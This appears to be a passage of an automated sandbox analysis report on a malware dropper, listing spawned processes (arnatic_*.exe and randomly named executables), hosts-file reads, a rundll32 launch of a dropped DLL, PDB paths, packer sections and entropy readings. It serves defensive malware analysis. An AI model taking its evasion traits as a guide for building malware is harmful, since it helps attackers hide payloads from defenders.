Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe arnatic_1.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe "C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe" -a	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe arnatic_3.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe arnatic_5.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.exe arnatic_6.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\4kmOewH8kDodZZ2lCCJUwR4o.exe "C:\Users\user\Documents\4kmOewH8kDodZZ2lCCJUwR4o.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\WN7mKI9_SQ4ujDwH_kKQHbe7.exe "C:\Users\user\Documents\WN7mKI9_SQ4ujDwH_kKQHbe7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\l7AR_7u5i2RZzKoKItslndOd.exe "C:\Users\user\Documents\l7AR_7u5i2RZzKoKItslndOd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\R2IpdvMDW3mqJjP0F3OqthCG.exe "C:\Users\user\Documents\R2IpdvMDW3mqJjP0F3OqthCG.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\duCdI76Gqz3hAbP72ldEGd_3.exe "C:\Users\user\Documents\duCdI76Gqz3hAbP72ldEGd_3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: C:\Users\user\Documents\bCyMoheCXfvXOWdcxUFW1mSl.exe "C:\Users\user\Documents\bCyMoheCXfvXOWdcxUFW1mSl.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe

Code function: 11_2_00401020 CoInitialize,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,SysAllocString,SysAllocString,SysAllocString,SysAllocString,lstrlenW,lstrlenW,VariantClear,VariantClear,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,VariantClear,VariantClear,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,

11_2_00401020

Source: arnatic_3.exe, arnatic_3.exe, 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, arnatic_3.exe, 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: arnatic_3.exe, arnatic_3.exe, 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, arnatic_3.exe, 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: arnatic_3.exe, arnatic_3.exe, 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, arnatic_3.exe, 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: arnatic_3.exe, arnatic_3.exe, 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, arnatic_3.exe, 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: arnatic_3.exe, arnatic_3.exe, 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, arnatic_3.exe, 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: arnatic_3.exe, 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, arnatic_3.exe, 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: arnatic_3.exe, arnatic_3.exe, 0000000F.00000000.325466872.00000000023E0000.00000040.00000001.sdmp, arnatic_3.exe, 0000000F.00000003.304993413.0000000002480000.00000004.00000001.sdmp, arnatic_3.exe, 0000000F.00000002.423380707.0000000000400000.00000040.00020000.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe rUNdlL32.eXe "C:\Users\user\AppData\Local\Temp\axhub.dll",main

Source: setup_install.exe

String found in binary or memory: -stop

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe

Static file information: File size 2831917 > 1048576

Source:	Binary string: C:\xexic.pdb source: arnatic_5.exe, 00000013.00000003.386971497.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.384363344.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.373506054.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.375268701.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.371883155.00000000079CA000.00000004.00000001.sdmp
Source:	Binary string: G:\MyProject\StreetPlayer\ExtraProgram\DropTarget\x64\Release_EXE\DTDrop64.pdb source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287987071.0000000002503000.00000004.00000001.sdmp
Source:	Binary string: C:\takibowuhawas\zoka_xuruj\wuxed.pdb source: arnatic_5.exe, 00000013.00000003.373008882.0000000007B30000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.491623122.0000000007B30000.00000004.00000001.sdmp
Source:	Binary string: L9C:\lucuwukib-75\namaletubo\xuyife.pdb source: arnatic_2.exe, 0000000D.00000000.299207441.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: C:\jejenos75 sic-fopotepumazok\katikame.pdb source: arnatic_5.exe, 00000013.00000003.374716400.0000000007A9B000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389718434.0000000007B57000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.374635601.0000000007A79000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.408864251.0000000007D11000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.371883155.00000000079CA000.00000004.00000001.sdmp
Source:	Binary string: C:\lucuwukib-75\namaletubo\xuyife.pdb source: arnatic_2.exe, 0000000D.00000000.299207441.0000000000401000.00000020.00020000.sdmp
Source:	Binary string: -C:\hapatepo_jaga\pulaciyegac\96\le.pdbhQE source: arnatic_5.exe, 00000013.00000003.375452967.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.387311684.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389485856.0000000007C48000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.373829127.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.372599132.0000000007A99000.00000004.00000001.sdmp
Source:	Binary string: C:\zulopif-hafos\90-ligis45-mejixaran54-kosoyidal yeducobe79\sabuzo.pdb source: arnatic_5.exe, 00000013.00000003.456363826.0000000006583000.00000004.00000001.sdmp
Source:	Binary string: C:\ruri weteveruj-57 picomamodige\secobud\nikume\hocu\f.pdb source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe, 00000001.00000003.287987071.0000000002503000.00000004.00000001.sdmp
Source:	Binary string: _C:\xexic.pdbh source: arnatic_5.exe, 00000013.00000003.386971497.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.384363344.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.373506054.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.375268701.0000000007BD5000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.371883155.00000000079CA000.00000004.00000001.sdmp
Source:	Binary string: C:\takibowuhawas\zoka_xuruj\wuxed.pdb source: arnatic_5.exe, 00000013.00000003.373008882.0000000007B30000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000002.491623122.0000000007B30000.00000004.00000001.sdmp
Source:	Binary string: C:\zulopif-hafos\90-ligis45-mejixaran54-kosoyidal yeducobe79\sabuzo.pdbhqE source: arnatic_5.exe, 00000013.00000003.456363826.0000000006583000.00000004.00000001.sdmp
Source:	Binary string: C:\pasuponematuvi_misawopala\zagiw100\pivogoxahapig\99\xiv.pdb source: arnatic_5.exe, 00000013.00000003.377964607.0000000007958000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382865802.0000000007960000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.383406550.0000000007992000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.377183063.0000000007A05000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379849621.0000000007959000.00000004.00000001.sdmp
Source:	Binary string: C:\hapatepo_jaga\pulaciyegac\96\le.pdb source: arnatic_5.exe, 00000013.00000003.375452967.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.387311684.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.389485856.0000000007C48000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.373829127.0000000007C47000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.372599132.0000000007A99000.00000004.00000001.sdmp
Source:	Binary string: Dx 5C:\pasuponematuvi_misawopala\zagiw100\pivogoxahapig\99\xiv.pdbh source: arnatic_5.exe, 00000013.00000003.377964607.0000000007958000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.382865802.0000000007960000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.383406550.0000000007992000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.377183063.0000000007A05000.00000004.00000001.sdmp, arnatic_5.exe, 00000013.00000003.379849621.0000000007959000.00000004.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe

Unpacked PE file: 7.2.setup_install.exe.400000.0.unpack .text:EW;.data:W;.rdata:W;/4:W;.bss:W;.idata:W;.CRT:W;.tls:W;/14:W;/29:W;/41:W;/55:W;/67:W;/80:W;/91:W;/102:W;.data:EW;.adata:EW; vs .text:ER;.data:W;.rdata:R;/4:R;.bss:W;.idata:W;.CRT:W;.tls:W;/14:R;/29:R;/41:R;/55:R;/67:R;/80:R;/91:R;/102:R;.data:EW;.adata:EW;

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00414150 push ecx; mov dword ptr [esp], ecx	1_2_00414151
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00418D80 push eax; ret	1_2_00418D9E
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Code function: 1_2_00418DB0 push eax; ret	1_2_00418DDE
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_0051B00A push ebp; ret	7_2_0051B00D
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00482030 push eax; mov dword ptr [esp], esi	7_2_00497A0D
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004660D0 push eax; mov dword ptr [esp], ebx	7_2_004661E6
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004690F0 push edx; mov dword ptr [esp], ebx	7_2_004693B5
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004690F0 push eax; mov dword ptr [esp], ebx	7_2_004693DF
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00459200 push eax; mov dword ptr [esp], ebx	7_2_004593C5
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00466310 push eax; mov dword ptr [esp], ebx	7_2_00466425
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00457400 push eax; mov dword ptr [esp], ebx	7_2_004579F6
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00468420 push edx; mov dword ptr [esp], ebx	7_2_00468631
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00468420 push eax; mov dword ptr [esp], ebx	7_2_0046864B
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00456490 push eax; mov dword ptr [esp], ebx	7_2_00456A90
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00469650 push edx; mov dword ptr [esp], ebx	7_2_00469915
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00469650 push eax; mov dword ptr [esp], ebx	7_2_0046993F
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004223CA push eax; mov dword ptr [esp], ebx	7_2_0049873A
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004223CA push eax; mov dword ptr [esp], ebx	7_2_0049873A
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_004807B0 push eax; mov dword ptr [esp], esi	7_2_00497A0D
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00456D90 push eax; mov dword ptr [esp], ebx	7_2_004573B8
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00455E50 push eax; mov dword ptr [esp], ebx	7_2_00456450
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00460E70 push eax; mov dword ptr [esp], ebx	7_2_00461026
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\setup_install.exe	Code function: 7_2_00426E24 push eax; mov dword ptr [esp], esi	7_2_00497A0D
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe	Code function: 11_2_004026A0 push eax; ret	11_2_004026CE
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_00468239 push ecx; ret	15_2_0046824C
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.exe	Code function: 15_2_0046E2B5 push ecx; ret	15_2_0046E2C8
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E80AAF push ecx; ret	19_2_00E80AC2
Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.exe	Code function: 19_2_00E395E6 push ecx; ret	19_2_00E395F9

Source: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.exe

Code function: 11_2_00401E70 LoadLibraryA,LoadLibraryA,GetEnvironmentVariableW,GetEnvironmentVariableW,GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetConsoleWindow,

11_2_00401E70

Source: CC4F.tmp.13.dr

Static PE information: 0xC8733C73 [Sun Jul 26 13:21:55 2076 UTC]

Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Static PE information: section name: .sxdata
Source: setup_install.exe.1.dr	Static PE information: section name: /4
Source: setup_install.exe.1.dr	Static PE information: section name: /14
Source: setup_install.exe.1.dr	Static PE information: section name: /29
Source: setup_install.exe.1.dr	Static PE information: section name: /41
Source: setup_install.exe.1.dr	Static PE information: section name: /55
Source: setup_install.exe.1.dr	Static PE information: section name: /67
Source: setup_install.exe.1.dr	Static PE information: section name: /80
Source: setup_install.exe.1.dr	Static PE information: section name: /91
Source: setup_install.exe.1.dr	Static PE information: section name: /102
Source: setup_install.exe.1.dr	Static PE information: section name: .adata
Source: libgcc_s_dw2-1.dll.1.dr	Static PE information: section name: /4
Source: libstdc++-6.dll.1.dr	Static PE information: section name: /4
Source: libstdc++-6.dll.1.dr	Static PE information: section name: .aspack
Source: libstdc++-6.dll.1.dr	Static PE information: section name: .adata
Source: arnatic_6.txt.1.dr	Static PE information: section name: !AHg.#
Source: arnatic_6.txt.1.dr	Static PE information: section name:
Source: libcurl.dll.1.dr	Static PE information: section name: /4
Source: libcurl.dll.1.dr	Static PE information: section name: /14
Source: libcurl.dll.1.dr	Static PE information: section name: /29
Source: libcurl.dll.1.dr	Static PE information: section name: /41
Source: libcurl.dll.1.dr	Static PE information: section name: /55
Source: libcurl.dll.1.dr	Static PE information: section name: /67
Source: libcurl.dll.1.dr	Static PE information: section name: /80
Source: libcurl.dll.1.dr	Static PE information: section name: .aspack
Source: libcurl.dll.1.dr	Static PE information: section name: .adata
Source: libcurlpp.dll.1.dr	Static PE information: section name: /4
Source: libcurlpp.dll.1.dr	Static PE information: section name: /14
Source: libcurlpp.dll.1.dr	Static PE information: section name: /29
Source: libcurlpp.dll.1.dr	Static PE information: section name: /41
Source: libcurlpp.dll.1.dr	Static PE information: section name: /55
Source: libcurlpp.dll.1.dr	Static PE information: section name: /67
Source: libcurlpp.dll.1.dr	Static PE information: section name: /80
Source: libcurlpp.dll.1.dr	Static PE information: section name: .aspack
Source: libcurlpp.dll.1.dr	Static PE information: section name: .adata
Source: CC4F.tmp.13.dr	Static PE information: section name: RT
Source: CC4F.tmp.13.dr	Static PE information: section name: .mrdata
Source: CC4F.tmp.13.dr	Static PE information: section name: .00cfg
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name:
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name: .A4SqVtu
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: section name: .adata
Source: file3[1].exe.19.dr	Static PE information: section name: .shared
Source: zCgmVlJU85h7EoUzOQ69Wnzh.exe.19.dr	Static PE information: section name: .shared

Source: initial sample

Static PE information: section where entry point is pointing to: .data

Source: WpPIUPf_de3qhcU6Yb86wV8v.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0xa87dd
Source: file4[1].exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x107921
Source: arnatic_6.txt.1.dr	Static PE information: real checksum: 0x0 should be: 0x34718
Source: arnatic_1.txt.1.dr	Static PE information: real checksum: 0x0 should be: 0xbc624
Source: z55am8ntfc1tzTQLqXuERA8s.exe.19.dr	Static PE information: real checksum: 0x377549 should be: 0x377c40
Source: arnatic_7.txt.1.dr	Static PE information: real checksum: 0x2bf14 should be: 0x29c3c
Source: LGWvGO5nGkFCrd4L2uFL5DeK.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x107921
Source: arnatic_4.txt.1.dr	Static PE information: real checksum: 0x0 should be: 0x11005
Source: arnatic_5.txt.1.dr	Static PE information: real checksum: 0x0 should be: 0xdf48d
Source: HR[1].exe.19.dr	Static PE information: real checksum: 0x0 should be: 0xa87dd
Source: _1UKif43Unz1FihnGsnEeFb1.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x244c20
Source: 0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	Static PE information: real checksum: 0x0 should be: 0x2b8fbe
Source: yZeDvYwRNsEq5bdzAW5HeKXc.exe.19.dr	Static PE information: real checksum: 0x0 should be: 0x159780

Source: initial sample	Static PE information: section name: .text entropy: 7.99815017314
Source: initial sample	Static PE information: section name: .text entropy: 7.99866963384
Source: initial sample	Static PE information: section name: .text entropy: 7.37685364608
Source: initial sample	Static PE information: section name: .text entropy: 7.94639918737
Source: initial sample	Static PE information: section name: !AHg.# entropy: 7.99745375359
Source: initial sample	Static PE information: section name: .text entropy: 7.83503470722
Source: initial sample	Static PE information: section name: .text entropy: 7.99814642994
Source: initial sample	Static PE information: section name: .text entropy: 7.9218416351
Source: initial sample	Static PE information: section name: .text entropy: 6.85305507137
Source: initial sample	Static PE information: section name: entropy: 7.99715676634
Source: initial sample	Static PE information: section name: entropy: 7.90578074088
Source: initial sample	Static PE information: section name: entropy: 7.99401213062
Source: initial sample	Static PE information: section name: entropy: 7.78256634522
Source: initial sample	Static PE information: section name: .rsrc entropy: 7.23339161013
Source: initial sample	Static PE information: section name: .A4SqVtu entropy: 7.91915720311
Source: initial sample	Static PE information: section name: BSS entropy: 7.99677259833
Source: initial sample	Static PE information: section name: .CRT entropy: 7.99681649606
Source: initial sample	Static PE information: section name: .CRT entropy: 7.99681649606

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_1.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_2.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_3.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_4.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_5.txt	Jump to dropped file
Source: C:\Users\user\Desktop\0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.exe	File created: C:\Users\user\AppData\Local\Temp\7zS4FBAB23D\arnatic_6.txt	Jump to dropped file
